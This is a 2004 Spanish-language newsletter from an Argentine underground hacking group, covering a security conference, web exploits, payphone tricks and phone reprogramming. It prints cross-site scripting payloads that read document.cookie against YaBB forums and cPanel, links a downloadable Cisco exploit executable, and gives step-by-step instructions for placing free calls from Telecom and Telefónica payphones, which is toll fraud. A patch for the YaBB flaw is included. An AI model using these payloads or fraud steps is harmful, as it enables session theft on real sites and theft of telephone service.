Mostrando mensaje 163     < Anterior | Siguiente > Responder a este mensaje Asunto: [NewsLCU] YaBB, CPanel, Cisco, CCNA, free calls, motorola v120, etc... Fecha: Lunes, 29 de Marzo, 2004  05:04:55 (-0300) Autor: Cyervo - LCU.com.ar <cyv @.......ar> ==================================== News Under - by La Covacha Underground ==================================== 5256 Members - Buenos Aires, Argentina ==================================== HTTP://www.LCU.com.ar - 29/03/04 ==================================== 1] Más Allá del Password 2004 2] YaBB/YaBBse Cross Site Scripting Vulnerability 3] More Cpanel Vuls (cross site scripting) 4] Exploit de Multiples Vulns para Cisco 5] Llamadas gratuitas desde teléfonos publicos TELECOM 6] Llamadas gratuitas desde teléfonos publicos TELEFONICA 7] Programando Motorola v120 8] Cool Sites 9] Off Topic & despedida ==================================== -------------------------------- 1] Más Allá del Password 2004 -------------------------------- Se realizo en el Hotel Hilton de Buenos Aires, Argentina, unas jornadas académicas referentes a la Seguridad Informática. La duración fue de 3 dias; 24, 25 y 26 de marzo. Las charlas fueron de un excelente nivel. http://www.convergencialatina.com/up/password2004/index.htm [Sitio oficial] http://www.kerozene.com.ar/fotos/2004-03%20-%20Password%202004/ [Fotos] -------------------------------- 2] YaBB/YaBBse Cross Site Scripting Vulnerability -------------------------------- XSS en foros YABB/YaBBse, hace ya mas de un mes que está vigente y aun no fue corregido! - Exploit [glow=red);background:url(javascript:alert(document.cookie));filter:glow(col or=red,2,300]Big Exploit[/glow] [shadow=red);background:url(javascript:alert(document.cookie));filter:shadow (color=red,left,300]Big Exploit[/shadow] - Parche [Reemplazar] -------------------------------------------------------------------------- '/\[glow=(.+?),(.+?),(.+?)\](.+?)\[\/glow\]/eis', '/\[shadow=(.+?),(.+?)\](.+?)\[\/shadow\]/eis', -------------------------------------------------------------------------- por: ---------------------------------------------------------------------------- ------- '/\[glow=([[:alpha:]]+?),(.+?),(.+?)\](.+?)\[\/glow\]/eis', '/\[shadow=([[:alpha:]]+?),(.+?)\](.+?)\[\/shadow\]/eis', ---------------------------------------------------------------------------- ------- y las lineas : ---------------------------------------------------------------------------- ------------------------------------------------- "'<table style=\"border 0px;\"><tr><td style=\"filter:Glow(color=\\1, strength=' . ('\\2' < 255 ? '\\2' : '255') . ');\">' . \"\\4\" . '</td></tr></table>'", ---------------------------------------------------------------------------- ------------------------------------------------- por: ---------------------------------------------------------------------------- ------------------------------------------------- "'<table style=\"border 0px;\"><tr><td style=\"filter:Glow(color=\\1, strength=' . intval( ('\\2' < 255 ? '\\2' : '255') ) . ');\">' . \"\\4\" . '</td></tr></table>'", ---------------------------------------------------------------------------- ------------------------------------------------- en el archivo Sources/Subs.php. -------------------------------- 3] More Cpanel Vuls (cross site scripting) -------------------------------- - Exploit http://site.com:2082/frontend/x/mail/dodelautores.html?email=<;script>a lert(document.cookie)</script> http://site.com:2082/frontend/x/mime/addhandle.html?ext=phpz&handle=<;scri pt>alert(document.cookie</script> -------------------------------- 4] Exploit de Multiples Vulns para Cisco -------------------------------- atachado [fuente]: cge.pl o bien pueden utilizar el .exe: http://www.illmob.org/0day/cisco-all.exe -------------------------------- 5] Llamadas gratuitas desde teléfonos publicos TELECOM -------------------------------- Levantamos el tubo del telefono y esperamos a que este de ocupado, una vez que pasa esto empezamos a contar hasta que llegue el numero 14 y mas o menos entre el tono de ocupado 14 y 16 marcamos la clave "114" : Y maravillosamente nos da un tono de marcardo. O sea... Los pasos son estos : 1-pluc ( levanto el tubo) 2-tengo que escribir un articulo en EPi(pienso) 3-digo en voz alta "quien es el mas elite?" 4-la maquina responde.... 5- tu tu tu tu tu tu tu tu tu tu tu tu tu ( ((tu tu tu)) ) Entre los parentesis imaginario de un numero contado en la mente por la cantidad de halagos que el telefono me da... tipeo 114 en el telefono 6- definitivamente el telefono se enamoro de mi, y hace un interminable "tuuuuuuuuuuuuuuuuuuuuuuuu" 7- Para no quedar mal, le damos un numero de telefono por si algun dia nos quiere llamar. Obviamente... gratis ;) Ten cuidado que me han dicho que afuera hay algo llamado "realidad", y no es broma. Seguramente es un mito, pero quien sabe.. "a lo mejor existe". cualquier cosa, "nos vemos ahi.." Para ustedes, los humanos: les escribio... Slyping (Slyping@elportal.info) http://www.elportal.info -------------------------------- 6] Llamadas gratuitas desde teléfonos publicos TELEFONICA -------------------------------- 1. Levantas el tubo del telefono 2. Marcas el numero que queres llamar MENOS el ultimo numero [de forma rapida] 3. Escuchas los tonos 4. Al escuchar el tono correspondiente al ultimo numero marcado, marcas rapido el numero faltante [rapido!] 5. Cortas con un golpe rapido de mano la palanquita para cortar el telefono si lo haces en un nanosegundo mejor, es RAPIDO. 6. Marcas "110" [*] Es impresindible que CORTES *bien* pero sin tener apretado, solo una fraccion de segundo y que la rapidez que le pongas a sto no te haga hacer cualquier cosa, tenes que marcar clara pero rapidamente el numero y colgar. Respira... exhala.... respira... eso tambien eh. Ejemplo; llamo a 15-5-419-1112 marco 1 5 5 4 1 9 1 1 1.. escucho los tonos hasta el ultimo y rapido marco 2 pegado al dos va mi mano deslizandose por el espacio para cortar el telefono ( no tenes que mantener apretado ) y marco "110" Una vez echo todo esto el telefono mostrara "110" y la llamada sera realizada. Si algo salio mal es probable que te aparesca cualquier otra cosa menos "110" Es posible que al intentar marcar "110" te salga el truco sin marcar el cero es decir marcando solo "11" pero marcar un 0 mas no te cuesta nada. -l0stb0y-(l0stb0y@elportal.info) http://www.elportal.info -------------------------------- 7] Programando Motorola v120 -------------------------------- Para cambiar nombre de la pantalla principal [y acceder a la reprogramación] 1.- Presiona la tecla menú y enseguida presiona 073887* lo mas rápido que puedas 2.- Te pide que ingreses tu código de seguridad (de fabrica es 000000). 3.- Selecciona configuración nam 4.- Selecciona nam1 5.- Luego nivel1 6.- Selecciona etiqueta domestico: telcel pcs o el nombre de tu compañía de servicio celular. 7.- Teclea el mensaje que desees 8.- Luego OK a todo y listo Para la próxima les mando el código del ringtone de los simuladores + el .mid para agregarlo al celular... :-) Gratis, obviop =P -------------------------------- 8] Cool Sites -------------------------------- http://www.thebroken.org http://www.illmob.org/0day/?M=D http://www.illmob.org/files.html http://www.lcu.com.ar/proxys.php [new!] http://www.hack-italia.org/ http://www.derechoinformatico.com/ http://www.lcu.com.ar/papers.php [Fast Track CCNA (new!)] http://p.ulh.as/xploits/ http://www.k-otik.com/ http://www.modelostop.com/?id=desnudasxxx&w=1&c=b [Solo España] http://www.iconosyfondos.com/?id=templates&w=3 [Solo España] http://www.librosparabajar.com/?id=fullebooks [Solo España] ---> http://www.lcu.com.ar [updated!] ---> http://www.aeolushosting.com.ar [hot prices!] -------------------------------- 9] Off Topic & despedida -------------------------------- - clap clap clap... aplausos para mel gibson...realmente se ve MUY bien aplicado sus conocimientos de marketing al mundo cinematografico. - Si buscas algun truco, programa, paper, dll, whatever... y no lo encontras, proba buscando en www.google.com, de lo contrario, manda tu mail a info@lcu.com.ar vamos a buscarlo, y si lo encontramos con gusto lo posteamos en el boletin siguiente. Hasta la prox... =) CyV [Cyervo] HTTP://www.lcu.com.ar HTTP://www.cyv.org.ar _______________________________________________________________________ Visita nuestro patrocinador: ~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~ ¿Donde quieres pasar las Navidades este año? eDreams te ofrece enormes ofertas en viajes y hoteles HOTELES Madrid, 1 noche 28€ Londres, 1 noche 28€ NUeva York, 1 noche 55€ VIAJES Londres - 120€ Paris - 170€ Roma - 99€ Nueva York - 280€ (Ida y vuelta incluidos) Haz clic aqui -> http://elistas.net/ml/135/ ~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~